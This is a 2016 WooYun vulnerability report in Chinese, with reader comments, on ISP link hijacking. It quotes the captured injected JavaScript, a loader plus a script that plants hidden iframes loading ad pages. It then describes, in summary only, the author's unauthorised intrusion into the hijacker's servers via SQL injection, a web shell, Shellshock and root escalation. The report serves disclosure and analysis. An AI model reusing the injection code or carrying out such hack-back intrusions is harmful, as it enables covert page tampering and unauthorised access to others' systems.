当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0228047

漏洞标题:一次对链路劫持的反击

相关厂商:互联网应急响应中心

漏洞作者: 路人甲

提交时间:2016-07-12 10:28

修复时间:2016-07-17 10:30

公开时间:2016-07-17 10:30

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-07-12: 细节已通知厂商并且等待厂商处理中
2016-07-12: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-07-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

起因是几个月前访问乌云和http网站时候网页播放蜜汁声音.当时还是dns劫持比较明显直接改dns就行,最近发现升级成为了链路劫持了,只能拔vpn过日子了.
这次懂得了广域网不用ssl已经不安全了.由衷的希望乌云可以上ssl... 如果分析有错希望大家多多包涵.感谢基友的帮忙..
最后多说一句劫持就算了吧 服务器做这么水 是要送肉鸡给鸡阔吗?
http://www.freebuf.com/vuls/62561.html
http://drops.wooyun.org/tips/11682
http://baike.baidu.com/link?url=_0eYS80EQMjttCrMOTKi6EwzymEAVgStJ9DkEWpHsNevMcPVv2xK4gjaeDzAiq8jfWdLfEaLn6uvqPuHCSD5CK

详细说明:

首先先看看先抓包看看

QQ截图20160711152436.jpg


发现百度统计的**.**.**.**的返回包有问题
**.**.**.**:8080/tt/1.js
/tt/1.js

var CUSTOM_LOADJS={support:document.dispatchEvent?"onload":"onreadystatechange",query:{},module:{},add:function(e,t,n){var r=this.module;if(r[e])throw e+" is being";r[e]={},r[e].url=t,r[e].isOkay=n||!1},use:function(e,t){var n={},r;n.namespaces=e.split(","),n.callback=t||function(){},**.**.**.**plet=0,n.total=n.namespaces.length,r=n.namespaces.join(""),this.query[r]=n,this.start(n,r)},start:function(e,t){var n=0,r=e.namespaces.length,i,s;for(n;n<r;n++){s=e.namespaces[n].replace(/^\s+|\s+$/g,""),i=this.module[s];if(i===undefined)throw s+" is undefined";i.isOkay===!1?(i.isOkay=1,this.load(i.url,s,t)):i.isOkay===!0?this.checkBack(s,t):this.wait(i,s,t)}},wait:function(e,t,n){var r=this,i=setInterval(function(){e.isOkay===!0&&(clearInterval(i),r.checkBack(t,n))},500)},checkBack:function(e,t){this.module[e].isOkay=!0;var n=this.query[t];++**.**.**.**plet===n.total&&(n.callback(),delete this.query[t])},load:function(e,t,n){var r=this,i=document.createElement("script");i[this.support]=function(){/undefined|loaded|complete/.test(i.readyState)&&r.checkBack(t,n)},i.setAttribute("type","text/javascript"),i.setAttribute("src",e),document.getElementsByTagName("head")[0].appendChild(i)}}
CUSTOM_LOADJS.add('customadjs', '**.**.**.**:8080/1.js');CUSTOM_LOADJS.use('customadjs', function(){});


1.js

~function(){
    try{
        if(window.location.href.indexOf('**.**.**.**') == -1 && window.location.href.indexOf('**.**.**.**') == -1){
                load_page('http://**.**.**.**/js/bbk365_ad_ext.html');
                   load_page('http://**.**.**.**/ad/ggj_51yrj.html');
                   load_page('http://**.**.**.**/ad/ggj_kea1688.html');
                  load_page('http://**.**.**.**/js/bbk365_ad.html');
		}
    }catch(ee){}
}();
function load_page(url){
    try {
        var x_ifr = '<div>'
            + ' <iframe style="display:none" src="'+url+'"></iframe>'
            + '</div>';
        var x = document.createElement('div');
        x.style.cssText="display:none;";
        x.innerHTML=x_ifr;
        document.body.appendChild(x);
    } catch (e) {
    }
}


1.js里面的

function load_page(url){
    try {
        var x_ifr = '<div>'
            + ' <iframe style="display:none" src="'+url+'"></iframe>'
            + '</div>';
        var x = document.createElement('div');
        x.style.cssText="display:none;";
        x.innerHTML=x_ifr;
        document.body.appendChild(x);
    } catch (e) {
    }
}


QQ截图20160711153032.jpg


http://**.**.**.**/js/bbk365_ad_ext.html
http://**.**.**.**/ad/ggj_51yrj.html
http://**.**.**.**/ad/ggj_kea1688.html
http://**.**.**.**/js/bbk365_ad.html
先查查域名信息吧,发现大多数都有域名信息保护

QQ截图20160711153634.jpg


然后叫机油用大数据找了一下发现这个邮箱是目标的常用邮箱之一于是找到了QQ

QQ截图20160711153821.jpg


QQ截图20160711153927.jpg


然后用Wireshark 确定一下是哪一跳出问题了.
可以看到有两个相同的包有一个被抛弃了

QQ截图20160711154404.jpg


QQ截图20160711155016.jpg


不可能在同一个地方跳两次呀有点可疑啊.
假设乌云的ttl值为64

QQ截图20160711155227.jpg


经过了9个路由应该是55呀 但是他是52 可以推测是第2-4附近的问题
可以得出**.**.**.**就是被劫持的路由器
然后对js调用的网站进行了渗透
http://**.**.**.**/存在一处注入
得到了数据库的root密码和ftp的密码

QQ截图20160711160156.jpg


然后发现是用lnmp搭建的悲催的是发现mysql被降权了,但是是站库分离 说不定数据库开放了ftp
于是对c段进行了扫描

QQ截图20160711160631.jpg


过程就是上传了一句话发现Disable_functions了然后用CVE-2014-6271 破壳漏洞搞定最后提权到root

QQ截图20160711161045.jpg


然后在数据库中找到了各种cms的密码进行getshell

QQ截图20160711161655.jpg


QQ截图20160711161709.jpg


QQ截图20160711161739.jpg


还有各种广告推广什么的 毕竟不懂他们盈利的方式
访问量

QQ截图20160711161045.jpg


大致准确吧

QQ截图20160711162232.jpg


QQ截图20160711162355.jpg


QQ截图20160711162650.jpg

漏洞证明:

劫持的链接有这么一个域名

QQ截图20160711163257.jpg


QQ截图20160711163350.jpg


发现这个规模不大的公司在做这个 毕竟我不是运营商圈内人士,加上重庆联通这边宽带是外包的就比较复杂 到底是哪个环节出了问题还请jc叔叔们去找了.这样劫持如果被其他黑阔搞下找个0day挂几天分分钟感染一大堆啊...

修复方案:

劫持就算了吧 服务器做这么水 是要送肉鸡给鸡阔吗?

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-07-17 10:30

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无

漏洞评价:

评价

  1. 2016-07-12 10:35 | adamyi ( 实习白帽子 | Rank:85 漏洞数:10 | 只是一只宝宝)

    前排

  2. 2016-07-12 10:55 | Raven ( 路人 | Rank:24 漏洞数:13 | 遇到彩虹,吃定彩虹!)

    狭路相逢路人甲胜

  3. 2016-07-12 12:13 | 骸骸 ( 普通白帽子 | Rank:153 漏洞数:35 | 专业装逼三十年。。。)

    打雷了

  4. 2016-07-12 12:14 | 带头大哥 ( 普通白帽子 | Rank:910 漏洞数:277 | |任意邮件伪造| |目录遍历| |任意文件读取|...)

    版权声明:转载请注明来源 路人甲@乌云

  5. 2016-07-12 12:23 | DataSource ( 路人 | Rank:7 漏洞数:4 | 本屌为小学生,还请各位大牛照顾)

    卖瓜子,卖爆米花,来来来了啊,让一让!

  6. 2016-07-12 12:50 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 渗透毁一生,破解穷三代。)

    听说霹雷了。

  7. 2016-07-12 12:53 | heoo ( 实习白帽子 | Rank:44 漏洞数:18 | 努力从来不会亏待任何一个人。)

    打雷是什么意思,求科普

  8. 2016-07-12 13:01 | 路飞 ( 普通白帽子 | Rank:116 漏洞数:22 | 上帝恩赐,命运天定。希望之光,普照我身。...)

    mark。

  9. 2016-07-12 13:06 | BurpSuite ( 路人 | Rank:3 漏洞数:2 | )

    什么宽带?长城宽带?鹏博士?

  10. 2016-07-12 13:09 | term ( 普通白帽子 | Rank:151 漏洞数:38 )

    @heoo 就是这个逼装的 雷都看不下去了 要劈死洞主

  11. 2016-07-12 13:11 | heoo ( 实习白帽子 | Rank:44 漏洞数:18 | 努力从来不会亏待任何一个人。)

    @term 0.0

  12. 2016-07-12 13:46 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  13. 2016-07-12 14:44 | 老实先生 ( 普通白帽子 | Rank:242 漏洞数:81 | 问君何不同风起,扶摇直上九万里!)

    ccav密切关注

  14. 2016-07-12 14:58 | skytws ( 实习白帽子 | Rank:87 漏洞数:37 | 好好学习,天天向上)

    6666

  15. 2016-07-12 15:36 | f4ckbaidu ( 普通白帽子 | Rank:265 漏洞数:33 | 开发真是日了狗了)

    666,目测劫持服务器有shellshock,被楼主日了?

  16. 2016-07-12 16:31 | SoulHunter ( 实习白帽子 | Rank:48 漏洞数:16 | 已经死了。)

    好想看啊!!!!!!

  17. 2016-07-17 10:37 | atiger77 ( 路人 | Rank:6 漏洞数:4 | 熟练掌握php,python,go,ruby,c++,java,html...)

    危害等级:无影响厂商忽略

  18. 2016-07-17 10:57 | Dusk ( 实习白帽子 | Rank:75 漏洞数:36 )

    这个也管不到人家的事啊,这种东西应该去通知谁?